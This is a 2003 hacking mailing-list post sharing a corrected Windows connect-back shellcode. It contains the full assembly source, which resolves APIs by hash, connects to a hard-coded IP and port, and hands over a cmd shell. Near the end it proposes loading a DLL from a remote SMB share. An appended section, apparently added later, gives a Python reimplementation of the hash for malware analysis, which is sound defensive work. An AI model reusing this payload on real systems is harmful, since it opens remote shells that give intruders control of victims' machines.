RE: [DARKLAB] Jingle Bells, Christmas Shells
- To: <[EMAIL PROTECTED]>
- Subject: RE: [DARKLAB] Jingle Bells, Christmas Shells
- From: "Brett Moore" <[EMAIL PROTECTED]>
- Date: Wed, 24 Dec 2003 12:58:58 +0100 (CET)
- In-reply-to: <[EMAIL PROTECTED]>
I got sick of concentrating,
"QUOTE"
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Brett Moore
Sent: Tuesday, December 09, 2003 6:14 PM
To: [EMAIL PROTECTED] Org
Subject: [DARKLAB] Jingle Bells, Christmas Shells
I got sick of optimising,
Enjoy.
Brett
;************************ Christmas Shells*********************************
; Callback Shell.
; Directly set std handles and call system()
;
; 200 (C8h) bytes
0xetc
"END QUOTE"
Yeah... well you should've really tested the code some more....
Yup, it's Christmas Eve, well it's ticked over to Christmas Day here, and in
the general spirit of raising glasses; I have done so... BUT
I have a theory. A) nobody noticed, b) nobody knew c) nobody tested it
d) all of the above.
Anyway to the guts of the problem. The code I posted worked fine in the
example, worked sweet against 'console' apps, but when I tried it against
a gui or 'non-console' app it really didn't like it..
So sorry for the confusion, it's now been amended. So a call to
AllocConsole() has been added. MSDN notes
----------------------------------------------------
The AllocConsole function allocates a new console for the calling process.
BOOL AllocConsole(VOID)
Parameters
This function has no parameters.
Return Values
If the function succeeds, the return value is nonzero.
If the function fails, the return value is zero. To get extended error
information, call GetLastError.
Remarks
A process can be associated with only one console, so the AllocConsole
function fails if the calling process already has a console. A process can
use the FreeConsole function to detach itself from its current console, and
then it can call AllocConsole to create a new console. If the calling
process creates a child process, the child inherits the new console.
AllocConsole also sets up standard input, standard output, and standard
error handles for the new console. The standard input handle is a handle to
the console's input buffer, and the standard output and standard error
handles are handles to the console's screen buffer. To retrieve these
handles, use the GetStdHandle function.
This function is primarily used by graphics applications to create a console
window. Graphics applications are initialized without a console. Console
applications are normally initialized with a console, unless they are
created as detached processes (by calling the CreateProcess function with
the DETACHED_PROCESS flag).
----------------------------------------------------
Which is all cool, but it creates a 'console' window on the server when
running the shell..
Perhaps CreateProcess with the detached flag is the way to go.
PEB->ProcessParameters?
So the new code + more to follow...
;*********************************** Christmas Shells ***************************************
; Callback Shell.
; Directly set std handles and call system()
;
; 205 (CDh) bytes
;
; its not code, its antic0de
; and it works now too %-)
; Left it in tasm format.
; tasm32 -ml /m5 shell.asm
; tlink32 -Tpe -c -x shell.obj ,,, import32
;
;*********************************** Christmas Shells ***************************************
; Jimminy jellicas its been jimplemented.
; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
; All the o/s peeps who know whats what.
;********************************************************************************************
.586p
locals
.model flat, stdcall
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn WSACleanup:PROC
.data
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends
wsadata WSAdata <?>
.code
;****************************************************************************
; Winsock + copy to stack code
;****************************************************************************
start:
; Winsock start up
push offset wsadata
push 0101h
call WSAStartup
or eax, eax
jz winsock_found
jmp codeend
winsock_found:
; copy ourselves onto stack
mov ebx,offset realstart
sub esp,400h
mov eax,esp
Copyit:
mov cl,byte ptr [ebx]
mov byte ptr [eax],cl
inc eax
inc ebx
cmp ebx,offset codeend
jle Copyit
jmp esp
;****************************************************************************
; This is the start of the shell code
;****************************************************************************
realstart:
jmp over_data
; 8 bytes of socket
sockdat db 02h,01h,07h,0d0h ; 0201,port (2000)
db 0c0h,0a8h,01h,3fh ; IP address 192.168.1.63
; 25 bytes of data
hashes db 01h ; Termination
dw 364Ah ; System msvcrt.dll
db "MSVCRT",01
dw 422Ah ; WSASocket ws2_32.dll
dw 8AD4h ; Connect ws2_32.dll
db "WS2_32",01
dw 817Ch ; AllocConsole kernel32.dll
dw 4E2Ch ; LoadLibrary kernel32.dll
over_data:
; 7 byte Getself code
push 0ACC3575Fh ; Pop/Push/Ret
call esp ; EIP returned in EDI
; EDI - 7 points to end of hashes
; find Kernel32 base + store peb address
mov esi,7ffdf00ch ; Offset into PEB
lodsd ; PPROCESS_MODULE_INFO
push dword ptr [esi] ; Store PEB->ProcessParameters->base address for later
mov esi,[eax + 1ch] ; InInitializationOrderModuleList
lodsd ; Grab Next Pointer (Kernel32.dll) in eax
mov edx,[eax + 08h] ; EDX = kernel32.dll base address
push -8 ; EDI Adjuster for later loadlibrary calls
lea ebx,[edi-8] ; EBX Holds address of hashes
LookupFunctions:
push esp ; Reset the stack base pointer
pop ebp ; So we can use EBP, and store current stack pos
; get RVA tables
mov ecx,dword ptr [edx + 3ch] ; Get NT Header Offset Address. Base + 3ch
mov esi,dword ptr [ecx + edx + 78h] ; Add Base And Move To Data Dictionary
lea esi,dword ptr [esi + edx + 1ch] ; Add Base And Move To The Tables
mov cl,3 ; 3 Loops, ECX was holding the NT Header offset 0x00d0 or similar
StoreAddress:
; Store addresses
lodsd ; EAX = Address Table / Name Ptrz / Ordinal RVA
add eax,edx ; Add Base Location
push eax ; Store it on stack
loop short StoreAddress ; Loopy
;*************************************************************************
; [EDI-7] = end of hashes
; EDI = start of Function address storage location
; EDX = dll base address
; EBX = address of hashes +1 (offset for loadlib implementation)
;*************************************************************************
SearchStart:
dec ebx ; Dec our EBX pointer to the hashes.
mov esi,dword ptr [ebp - 8] ; Get Name Ptrz Table
xor eax,eax ; Set Our API Counter To 0
push eax ; Push a 0 for later
Search:
push eax ; Store our API counter
lodsd ; Load address of function name from [ESI] into EAX
add eax,edx ; Add DLL base address
xor ecx,ecx ; Zero our hash value counter
hashy:
add cx,word ptr [eax] ; Add it up
add cl,byte ptr [eax] ; Add it up
inc eax ; Move along
cmp byte ptr [eax],01 ; End of string
jge hashy ; Nup
pop eax ; Restore Our API Counter
inc eax ; Inc our API counter
cmp cx,[ebx] ; Compare To Hash Value
jne Search ; We go and check the next name if they don't match
; GotMatch
pop esi ; Pop a 0
xchg esi,eax ; Get Our API Counter Into ESI, 0 into EAX
dec esi ; Adjust our API counter back 1
shl esi,1 ; ESI = ESI * 2
add esi,dword ptr [ebp - 0ch] ; Normalize With Ordinal VA
lodsw ; Get Ordinal in AX Word Only
shl eax,2 ; EAX = AX * 4
add eax,dword ptr [ebp - 4h] ; Normalize With Address VA
xchg esi,eax ; Swap them around
lodsd ; Load Function address into EAX
add eax,edx ; Normalize with the base and all is done.
stosd ; Store the function location in [EDI]
; We sub 1 here, 1 up at SearchStart. Strange loadlib implementation
dec ebx ; To move to next hash. No byte loss
cmp byte ptr [ebx],01h ; Hash dll separator
jne short SearchStart ; Go and find another API
; Requires a loadlibrary call
leave ; Adjust stack back, pops EDI adjuster in EBP
dec byte ptr [ebx] ; Create a null terminator
sub ebx,06h ; Move down hash table
cmp byte ptr [ebx],07h ; Past our hashes?
je short Done_Finding ; Done
push ebx ; Push address of dll
call dword ptr [edi + ebp] ; Call LoadLibrary
xchg edx,eax ; Save base Address
push -16 ; Store EDI Adjuster
dec ebx ; We sub 1 here, 1 up at SearchStart. Strange loadlib implementation
jne short LookupFunctions ; Load the next DLLS functions
Done_Finding:
;*****************************************
; [EDI - 04h] System
; [EDI - 08h] WSASocket
; [EDI - 0ch] Connect
; [EDI - 10h] AllocConsole
; [EDI - 14h] LoadLibrary
;*****************************************
xchg eax,ebp ; Store the system() address
; Create console
call [EDI - 10h] ; Call AllocConsole()
xor ecx,ecx ; Null ECX
; call WSASocket
push ecx ; Push 0
push ecx ; Push 0
push ecx ; Push 0
push ecx ; Push 0
inc ecx ; Increment ecx
push ecx ; Push 1
inc ecx ; Increment ecx
push ecx ; Push 2
call [EDI - 08h] ; Call WSASocket
xchg ecx,edi ; Store API storage
; Directly edit the standard handles
pop edi ; Pop PEB->ProcessParameters->base address
add edi,18h ; And adjust
stosd ; Set handle
stosd ; Set handle
stosd ; Set handle
; Setup socket data
dec ebx ; Need to
dec byte ptr [ebx] ; Remove 01
dec ebx ; And position
; call connect
push ebx ; Push the name structure length. Doesn't seem to matter. std is 10h
push ebx ; Push location of structure
push eax ; Push socket
call [ecx - 0ch] ; Call Connect
; Call system()
push 20646D63h ; Push cmd on stack, null exists from above
push esp ; Location to cmd
call ebp ; Call system()
nop
call WSACleanup
codeend:
end start
---------EOF
Yup so merry times to you all, sorry about the formatting...
Today is family christmas day for me. Then no PC for an undetermined amount
of time...
So I hope you all enjoy your times,,,
hMod = LoadLibrary("\\\\IP\\share\\exploit.dll");
~
rundll32 \\IP\share\user32.dll,MessageBoxA asdad
I figure a shell could be created that found loadlib and then loaded the
remote dll..
Only work locally/intranet type range with sharing enabled... But could be
kinda cool...
Sorry for the muckup on the first shellcode post, merry holiday times.. Cyua
??
Brett
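The `hashy` loop in the shellcode above is a small 16-bit hash over each export name, and the five constants in the `hashes` table (364Ah, 422Ah, 8AD4h, 817Ch, 4E2Ch) are what it compares against. The Python below is an added example, not code from the post or from Brett: it reimplements that loop so an analyst who finds the same constants in a sample can map them back to export names by hashing a candidate list. The candidate list here is constructed for the example; the function names that resolve are ordinary Win32/CRT export names, and the constants are the ones from the post.

```python
# Added example: reimplementation of the export-name hash used by the
# "hashy" loop in the DarkLab shellcode, for mapping its 16-bit constants
# back to API names during analysis. Not part of the original post.
#
# The assembly being mirrored:
#   add cx, word ptr [eax]   ; add the little-endian 16-bit word at the cursor
#   add cl, byte ptr [eax]   ; add the current byte to CL again (no carry into CH)
#   inc eax
#   cmp byte ptr [eax], 01h  ; stop once the next byte is the NUL terminator
#   jge hashy                ; (signed compare: bytes >= 0x80 would also stop it)
from typing import Dict, Iterable, List


def darklab_hash(name: str) -> int:
    """Return the 16-bit hash the shellcode computes for a NUL-terminated export name."""
    data = name.encode("ascii") + b"\x00"  # export names in the PE are NUL-terminated
    cx = 0
    i = 0
    while True:
        word = data[i] | (data[i + 1] << 8)   # word ptr [eax], little-endian
        cx = (cx + word) & 0xFFFF             # add cx, word ptr [eax]
        cl = ((cx & 0xFF) + data[i]) & 0xFF   # add cl, byte ptr [eax]; CH untouched
        cx = (cx & 0xFF00) | cl
        i += 1
        nxt = data[i]
        if nxt == 0 or nxt >= 0x80:           # cmp byte ptr [eax],1 / jge (signed)
            break
    return cx


def build_table(names: Iterable[str]) -> Dict[int, List[str]]:
    """Precompute hash -> candidate names. A 16-bit hash collides easily, so keep lists."""
    table: Dict[int, List[str]] = {}
    for n in names:
        table.setdefault(darklab_hash(n), []).append(n)
    return table


def resolve(constants: Iterable[int], table: Dict[int, List[str]]) -> Dict[int, List[str]]:
    """Map each constant found in a sample to the candidate names that hash to it."""
    return {c: table.get(c, []) for c in constants}


# Constructed candidate list: the exports a connect-back shell commonly
# touches, plus a few neighbours so the table is not just the answer key.
CANDIDATES = [
    "system", "LoadLibraryA", "LoadLibraryW", "AllocConsole", "FreeConsole",
    "GetStdHandle", "WSASocketA", "WSASocketW", "WSAStartup", "connect",
    "bind", "listen", "accept", "CreateProcessA", "ExitProcess",
]

# The five constants from the post's hash table.
SAMPLE_CONSTANTS = [0x364A, 0x422A, 0x8AD4, 0x817C, 0x4E2C]

if __name__ == "__main__":
    table = build_table(CANDIDATES)
    for const, names in resolve(SAMPLE_CONSTANTS, table).items():
        print(f"{const:04X}h -> {', '.join(names) if names else '<no candidate>'}")
```

Run it and the five constants come back as system, WSASocketA, connect, AllocConsole and LoadLibraryA (the ANSI variants, which is what the comments in the post mean by WSASocket and LoadLibrary). In practice the candidate list would be every export name of the DLLs the sample names, so that a match is meaningful and collisions are visible rather than silently resolved.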
-
The DarkLab.org mailing list. http://www.darklab.org